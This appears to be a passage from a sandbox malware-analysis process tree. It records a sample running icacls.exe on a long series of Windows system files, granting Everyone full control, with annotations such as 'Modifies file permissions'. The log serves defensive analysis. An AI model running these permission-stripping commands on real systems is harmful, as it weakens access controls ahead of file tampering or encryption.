    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28748306-9f02-a5d7-6ded-4459fddadc31.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3292
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2a3adcd0-4ddc-f3d2-6bcb-f11f9cbc1e2c.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:792
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3c8c7eb3-7a1d-7981-0472-571cdd1d1292.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6136
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3ebdb897-991b-934f-ee13-2ca21ed81938.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4664
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3f586f55-284b-e455-06b2-84c84e8d0d2d.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7148
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\41b63f44-ec3b-79f7-4657-c8f0727d1b13.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:816
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\4c4ecbc0-0ec0-3929-aebb-a931a339fb23.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4284
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\517cfcaf-138b-1796-2cea-62892204250a.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3572
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\5b0a39aa-16e0-a938-f694-656664c7be15.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6612
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\600364a7-e11c-efda-2c12-eac40e75f19a.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6572
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\61b5bd89-4cb0-db77-6622-cb63b5a58080.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4736
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\630a70e7-1832-4f42-e2a2-5d35fdddc45f.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6212
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\67447b0c-05cf-6740-5f7b-391ab440c42d.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6084
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\6e90ed81-9187-fa62-ce90-f18d7bed6b12.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4256
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71c8f37a-a7b9-aff0-6de0-9b276c089ad6.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4940
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71ef3df1-f4b1-69cd-793a-48e165e282aa.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3136
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7309084a-bb6f-20c3-ea54-aa108ceab1ae.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6732
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7646fa0f-b52c-71a8-3aed-950dd1668c09.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4252
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8292682a-6850-c06c-9b6d-9646f16d4ed0.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4348
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\865e8f30-20a1-9528-bb48-42999b5b2aa8.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6856
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8ce3d3dd-a4c7-6c38-5fde-1f9f5df98807.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4908
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8d56e57b-8663-136d-ff69-a004e217825a.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4788
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8e383e90-b2f9-7bf2-1d5b-4e47dcb2014e.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2092
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\9d3ad23c-c6b8-7fb5-e4ab-f5d0a66dcfbc.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3632
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a1e5b165-0532-a6a3-f542-0c5c162be3e1.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7092
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a7e08b8b-ad4b-af00-ebcc-1aa29a833ce9.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6228
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ac116a72-b6b1-d558-23f6-10796e634d41.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5872
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b34b197c-c0ed-bf12-c9bb-44e883c66a9d.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:200
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b81d7e70-84e7-b16a-e3d0-1e7aa2f1232d.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6988
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbc7a1c3-44c6-27b6-1e16-487a47263f3e.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4360
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbfbe8ad-1a35-a7f3-33bc-40912bf89dfb.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2096
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bcda97bb-bfd0-2a72-3c90-c8518f3d09ee.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4668
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c3d42a1a-2f3f-a4a9-6a04-cc1b234485fb.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5808
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c94a6c18-d496-da1c-8a02-fc6976e0145e.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6204
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ca947da2-7e9a-7249-8095-bceb379c6f74.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4872
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\cb692946-a9f3-639d-1064-a6d75a01b9c3.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4240
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d1ecfce2-f845-c1e9-052b-d2f457c135e6.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6040
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d508ba05-d8aa-2836-484d-3833d22fe185.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6900
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d90ad1eb-bec3-18c1-8c97-eef683ba6a1f.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5828
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e2a686b1-b02a-b3e7-90cb-3fa0d708ce04.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4392
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e335baf1-18ab-73fe-e089-3fa0a6e71a35.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6008
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e64ffef1-e246-b632-595b-56076a3fa776.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6788
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8ac9388-7c9c-19cc-fd4d-cb72bb1544ea.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6664
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8fff2df-6041-8f21-3df7-db31661aa09b.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5448
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ecbc2601-0a67-4963-e594-43c65d6ec9a5.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6288
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\eee47229-947d-2ac7-e8a3-49bafee251d1.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6076
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\f1bb69b5-a7d1-df8f-5820-49f387fd5d2e.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4396
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\fc93b452-8a84-dede-3b7a-0fc9413c4592.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4844
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q
    3⤵
    PID:2664
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
    3⤵
    PID:4656
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\1527c705-839a-4832-9118-54d4Bd6a0c89_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6848
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\c5e2524a-ea46-4f67-841f-6a9465d9d515_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6156
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\CortanaListenUIApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6960
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopLearning_1000.15063.0.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6748
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopView_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5288
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\E2A4F912-2574-4A75-9BB0-0D023378592B_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4720
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\EnvironmentsApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5300
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloCamera_1.0.0.5_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3772
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloItemPlayerApp_1.0.0.2_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2972
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloShell_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4644
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4252
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5316
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7124
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5744
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5668
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AAD.BrokerPlugin_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6236
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AccountsControl_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6404
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5980
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4620
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6560
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3960
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Modifies data under HKEY_USERS
      PID:6036
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5384
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5608
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BioEnrollment_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4420
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.CredDialogHost_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6296
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4560
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4444
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5912
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.1.25002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5808
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5712
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5512
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.2.24002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:1792
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3276
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6900
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4300
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4304
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_2017.311.255.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6728
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6664
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:656
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6276
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2236
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7156
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6096
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4864
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4656
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5592
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6152
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:208
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5580
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4368
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6084
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_2015.7668.58071.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4316
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3852
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4532
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4496
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3932
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6012
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4500
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2012
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_2017.222.1920.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4792
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.PPIProjection_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6092
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-100_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5216
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4136
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_~_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6404
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4924
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.454.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5048
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4056
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
